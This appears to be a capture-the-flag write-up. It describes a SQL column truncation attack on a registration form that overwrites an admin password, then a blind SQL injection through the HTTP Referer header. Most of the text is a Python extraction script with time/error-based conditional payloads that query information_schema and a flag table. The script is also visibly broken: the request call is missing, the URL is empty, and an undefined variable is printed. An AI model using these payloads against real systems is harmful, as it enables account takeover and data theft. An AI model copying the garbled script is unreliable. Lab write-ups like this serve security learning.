The first flag was about SQL column truncation vulnerability. So after finding registration page just enter something like this:[email protected]%26regpass1%3Dasd123%26regpass2%3Dasd123

for overwrite the admin password and then just login with admin:asd123 to get the first flag.

The second flag was about BSQLi in HTTP header ‘Refer’ but for trigger it you’ll have to URL encode it. Script I used to extract the second flag:

import json,requests
url = ''
payload = {'some': 'data'}
# table: flag
# clmn flag
#flag: 1362390
for j in xrange(1,8):
    for i in xrange(33,122):
        #headers = {'Referer': 'ad%27),((select if((select ascii(substr(table_name,'+str(j)+',1)) from information_schema.tables where table_schema=database() limit 0,1)='+str(i)+',1,2*(select 1 union select 2))),0)%23'}
        #headers = {'Referer': 'ad%27),((select if((select column_name from information_schema.columns where table_name=0x666c6167 limit 0,1)=0x666c6167,1,2*(select 1 union select 2))),0)%23'}
        headers = {'Referer': 'ad%27),((select if((select ascii(substr(flag,'+str(j)+',1)) from flag limit 0,1)='+str(i)+',1,2*(select 1 union select 2))),0)%23'}
        r =, data=json.dumps(payload), headers=headers)
        if 'touch' in r.text:
            print "OK:"+chr(i)
            print "Nope:"+str(i)

print pwd